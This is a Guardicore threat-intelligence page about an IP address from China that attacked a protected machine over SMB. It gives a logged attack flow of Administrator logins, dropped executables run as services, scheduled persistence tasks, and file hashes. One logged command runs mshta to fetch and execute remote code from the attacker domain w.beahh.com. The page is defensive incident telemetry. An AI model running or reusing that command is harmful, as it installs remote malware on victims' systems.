IP Address: 180.172.142.7Previously Malicious

Weekly Summary

Browse or download a weekly review of our cyber threat intelligence data and gain more insight to help protect your network

Top Threats

Cyber Threat Intelligence

Discover Malicious IPs and Domains with Guardicore Cyber Threat Feed

IP Address:
180.172.142.7​
Previously Malicious

This IP address attempted an attack on a machine protected by Guardicore Centra

Threat Information

Role

Attacker, Scanner

Services Targeted

SMB MSSQL

Tags

SMB Null Session Login Service Deletion Access Suspicious Domain Service Stop DNS Query File Operation By CMD Scheduled Task Creation Service Start Access Share SMB Successful SMB Login SMB Share Connect Download File Service Creation Execute from Share Download and Execute CMD

Associated Attack Servers

w.beahh.com

Basic Information

IP Address

180.172.142.7

Domain

-

ISP

China Telecom Shanghai

Country

China

WHOIS

Created Date

-

Updated Date

-

Organization

-

First seen in Guardicore Centra

2019-05-12

Last seen in Guardicore Centra

2019-05-12

What is Guardicore Centra
Guardicore Centra is a data center and cloud security solution that protects the organization's core assets, using flexible, quickly deployed and easy to understand micro-segmentation controls. Centra generates in-context security incidents, with details on attacker tools and techniques, that help IR teams prioritize incident investigation and reduce dwell time. Learn More

Attack Flow

A user logged in using SMB with the following username: Administrator - Authentication policy: Correct Password

Successful SMB Login

C:\xgFAMgez.exe was downloaded

Download File

A user logged in using SMB with the following username: Administrator - Authentication policy: Previously Approved User 13 times

Successful SMB Login

xgfamgez.exe was executed from the remote share \\server-backup\c$

Execute from Share

c:\windows\system32\services.exe installed and started \\server-backup\c$\xgfamgez.exe as a service named FRhI under service group None

Service Start Service Creation

C:\dMIZaFfZ.exe was downloaded

Download File

C:\UejeXkmf.exe was downloaded

Download File

C:\windows\temp\svchost.exe was downloaded

Download File

dmizaffz.exe was executed from the remote share \\server-backup\c$

Execute from Share

c:\windows\system32\services.exe installed and started \\server-backup\c$\dmizaffz.exe as a service named bQfc under service group None

Service Start Service Creation

uejexkmf.exe was executed from the remote share \\server-backup\c$

Execute from Share

c:\windows\system32\services.exe installed and started \\server-backup\c$\uejexkmf.exe as a service named vdiy under service group None

Service Start Service Creation

C:\windows\temp\upinstalled.exe was downloaded

Download File

C:\windows\temp\tmp.vbs was downloaded

Download File

Service vdiy was stopped

Service Stop

Process c:\windows\system32\mshta.exe attempted to access suspicious domains: w.beahh.com

DNS Query Access Suspicious Domain

The command line C:\WINDOWS\system32\cmd.exe /c mshta http://w.beahh.com/page.html?pSERVER-BACKUP was scheduled to run by modifying C:\WINDOWS\Tasks\Autocheck.job

The command line c:\windows\FZPlvN.exe was scheduled to run by modifying C:\WINDOWS\Tasks\Autostart.job

C:\QlYHuLQN.exe was downloaded

Download File

The file C:\WINDOWS\wdwv.exe was downloaded and executed

Download and Execute

The command line c:\windows\wdwv.exe was scheduled to run by modifying C:\WINDOWS\Tasks\escan.job

qlyhulqn.exe was executed from the remote share \\server-backup\c$

Execute from Share

c:\windows\system32\services.exe installed and started \\server-backup\c$\qlyhulqn.exe as a service named BdjD under service group None

Service Start Service Creation

C:\adRhGFvP.exe was downloaded

Download File

adrhgfvp.exe was executed from the remote share \\server-backup\c$

Execute from Share

c:\windows\system32\services.exe installed and started \\server-backup\c$\adrhgfvp.exe as a service named PWAI under service group None

Service Start Service Creation

C:\WINDOWS\Temp\tmp.vbs was downloaded

Download File

Service BdjD was stopped

Service Stop

Service PWAI was stopped

Service Stop

C:\eZCzPLjU.exe was downloaded

Download File

C:\EPWFVLec.exe was downloaded

Download File

c:\windows\system32\services.exe installed and started \\server-backup\c$\ezczplju.exe as a service named gzSj under service group None

Service Start Service Creation

ezczplju.exe was executed from the remote share \\server-backup\c$

Execute from Share

C:\DddCORug.exe was downloaded

Download File

Connection was closed due to timeout

Associated Files

\\server-backup\c$\zilnbirc.exe

SHA256: 3c2fe308c0a563e06263bbacf793bbe9b2259d795fcc36b953793a7e499e7f71

56320 bytes

C:\Windows\temp\svchost.exe

SHA256: c50186852c138cdedaff387e0982cd3c63bfe930ea6872903b8b5ec488c08d70

65000 bytes

C:\oBPbANxC.exe

SHA256: 18ac27018f1d8a11a85edde71134addd7bb119b82e04733902789ca2eab11df1

56320 bytes

C:\ClhOvCkU.exe

SHA256: 6fdeb98fba59ff81f4ad976edd2701464a1c3c33a3b331f9822a1314a7e2f743

56320 bytes

C:\windows\temp\svchost.exe

SHA256: f80f323ca202fe25afa4346731bab511f970a10a7084e9c98af9369d941f8e81

65000 bytes

C:\Windows\temp\updll.exe

SHA256: d08490dbf496538a10797e29d4397cee3c83dffc15ef2bec2ecc9e9246ac302e

390000 bytes

C:\Windows\temp\svchost.exe

SHA256: 1de43c7b870ca581c832f5a29488b4d8d58dbbb53d75db6bc850c792c0172049

2990000 bytes

C:\windows\temp\upinstalled.exe

SHA256: 2e754f936a2427edf236e31ac95428bfd7ee3590903d9147fa19faabde0af4d1

2795000 bytes

C:\WINDOWS\wdwv.exe

SHA256: 5de0cd8e8c0ebe0a1acf33a5048ce60e115b51ce1cb9fbf643793ae3761b7441

390000 bytes

Oops! - Do you see your IP here? Contact us at labs@guardicore.com to remove it from the Threat Intelligence data.

IP Address: 180.172.142.7​Previously Malicious